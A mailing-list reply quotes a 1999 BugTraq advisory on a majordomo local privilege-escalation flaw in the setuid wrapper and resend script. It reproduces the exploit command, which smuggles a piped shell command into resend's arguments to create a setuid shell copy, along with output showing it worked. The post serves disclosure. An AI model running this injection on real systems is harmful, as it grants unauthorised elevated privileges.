Hi Torsten,
can you say (or point to an URL), what these vulnerabilities are? Getting root-rights as a normal user? Or just abusing majordomo, getting around moderation etc.?
Have a look at: http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-12-29&thread=386C1759.2E59B346@hem.passagen.se OVERVIEW from BugTraq: ------------------------- [Brock Tellier (initialy reported):] OVERVIEW A vulnerability in majordomo allows local users to gain elevated privileges. DETAILS The majordomo wrapper allows users to run programs in the /usr/local/majordomo directory with the uid of owner and the gid of daemon. The permissions for wrapper are: -rwsr-xr-x 1 root daemon 6464 Jan 4 1999 /usr/local/majordomo/wrapper but wrapper immediatly setuid()'s and setgid()'s to owner:daemon before execing the wrapped program. A vulnerability in "/usr/local/majordomo/resend" will allow us to execute arbitrary commands with our elevated privileges. The following code snippet appears in resend, a perl script: -snip- [...] EXPLOIT Our exploit is simple: bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec' resend: must specify '-l list' at /usr/local/majordomo/resend line 77. bash-2.02$ ls -la /tmp/xnec -r-sr-sr-x 1 owner daemon 361688 Dec 29 06:26 /tmp/xnec ------------------------------------------